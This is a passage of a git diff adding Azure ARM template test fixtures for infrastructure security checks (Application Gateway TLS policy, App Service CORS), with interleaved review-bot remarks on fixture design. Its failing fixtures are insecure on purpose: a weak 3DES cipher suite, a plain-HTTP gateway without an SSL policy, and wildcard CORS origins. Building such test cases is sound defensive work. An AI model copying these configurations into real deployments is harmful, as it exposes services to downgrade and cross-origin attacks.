"TLS_AES_128_GCM_SHA256","TLS_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", + "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA" + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json new file mode 100644 index 00000000000..1e51ad85903 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json 
@@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_pass", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + 
"properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + 
"TLS_AES_128_GCM_SHA256", + "TLS_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json new file mode 100644 index 00000000000..a0bb9a2a128 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json 
@@ -0,0 +1,276 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "minValue": 1, + "maxValue": 10, + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddressDefault": { + "type": "string", + "metadata": { + "description": "IP Address of Default Backend Server" + } + }, + "backendIpAddressForPathRule1": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 1 match" + } + }, + "backendIpAddressForPathRule2": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 2 match" + } + }, + "pathMatch1": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 1" + } + }, + "pathMatch2": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 2" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[variables('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "without_sslPolicy_fail", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendPublicIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": 
"appGatewayFrontendPort80", + "properties": { + "Port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPoolDefault", + "properties": { + "BackendAddresses":[ + { + "IpAddress": "[parameters('backendIpAddressDefault')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool1", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule1')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool2", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendPublicIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort80')]" + }, + "Protocol": "Http" + } + } + ], + "urlPathMaps": [ + { + "name": "urlPathMap1", + "properties": { + "defaultBackendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPoolDefault')]" + }, + "defaultBackendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + }, + "pathRules": [ + { + "name": "pathRule1", + "properties": { + "paths": [ + "[parameters('pathMatch1')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool1')]" + 
}, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + }, + { + "name": "pathRule2", + "properties": { + "paths": [ + "[parameters('pathMatch2')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool2')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ] + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "PathBasedRouting", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "urlPathMap": { + "id": "[resourceId('Microsoft.Network/applicationGateways/urlPathMaps',variables('applicationGatewayName'), 'urlPathMap1')]" + } + } + } + ] + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json new file mode 100644 index 00000000000..b889454d7a8 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/fail.json 
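Review bot: The `without_sslPolicy_fail` fixture removes more than the `sslPolicy` block: its only listener is `"Protocol": "Http"` on frontend port 80 with no certificate, whereas the pass fixture terminates TLS on 443 and references an `SslCertificate`. A check that also (or instead) flags plain-HTTP listeners would fail this template for the wrong reason, so the test does not show that the absence of `sslPolicy` alone is what is detected. Keeping the HTTPS listener, certificate reference and port 443 from the pass fixture and deleting only the `sslPolicy` object would isolate the condition under test. Also note the resource is named `without_sslPolicy_fail` while every `resourceId(...)` inside it points at `variables('applicationGatewayName')` = `applicationGateway1`; harmless for a static check, but the fixture would not resolve if deployed.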
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "*" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ 
+ "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": 
"string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json new file mode 100644 index 00000000000..28a78e3a72c --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceDisallowCORS/pass.json 
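Review bot: The fail case sets `"allowedOrigins": ["*"]` as a single-element list, which only shows that a lone wildcard is caught. The exposure is the same when `*` sits behind other entries, e.g. `["https://app.example.com", "*"]`, and a second `Microsoft.Web/sites` resource with that list would confirm the check walks the whole list rather than the first element (I cannot see the check here, so this is an inference from the fixture). The other values are schema placeholders (`"bool"`, `"string"`), which is fine for a static check; if the check also looks at `supportCredentials`, a variant with it set to `true` is the other case worth pinning.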
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json index 074e4fdfded..04a41face4c 100644 --- a/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json +++ b/tests/arm/checks/resource/example_AppServiceDotnetFrameworkVersion/passed.json 
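Review bot: The single allowed origin in the pass fixture is the sentence `"is try string to app service disallow cors"`, which is not an origin and reads like scratch text left in. A concrete value such as `"https://app.example.com"` documents what a compliant `cors.allowedOrigins` entry looks like and avoids the impression that the check accepts arbitrary strings. The fixture also does not cover a site with no `cors` block at all; whether that should pass or be reported as unknown is not settled by these two files, so a third resource would make the intended behaviour explicit.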
@@ -111,7 +111,7 @@
 "index.php",
 "hostingstart.html"
 ],
- "netFrameworkVersion": "v7.0",
+ "netFrameworkVersion": "v8.0",
 "phpVersion": "5.6",
 "requestTracingEnabled": true,
 "requestTracingExpirationTime": "9999-12-31T23:59:00Z",
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
new file mode 100644
index 00000000000..14ae320416e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
@@ -0,0 +1,74 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "webAppName": {
+ "type": "string",
+ "defaultValue" : "AzureLinuxApp",
+ "metadata": {
+
+ "description": "Base name of the resource such as web app name and app service plan "
+ },
+ "minLength": 2
+ },
+ "sku":{
+ "type": "string",
+ "defaultValue" : "S1",
+ "metadata": {
+ "description": "The SKU of App Service Plan "
+ }
+ },
+ "linuxFxVersion" : {
+ "type": "string",
+ "defaultValue" : "php|7.0",
+ "metadata": {
+ "description": "The Runtime stack of current web app"
+ }
+ },
+ "location": {
+ "type": "string",
+ "defaultValue": "[resourceGroup().location]",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ }
+ },
+ "variables": {
+ "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/serverfarms",
+ "apiVersion": "2018-02-01",
+ "name": "[variables('appServicePlanName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('sku')]"
+ },
+ "kind": "linux",
+ "properties":{
+ "reserved":true
+ }
+ },
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2018-11-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "kind": "app",
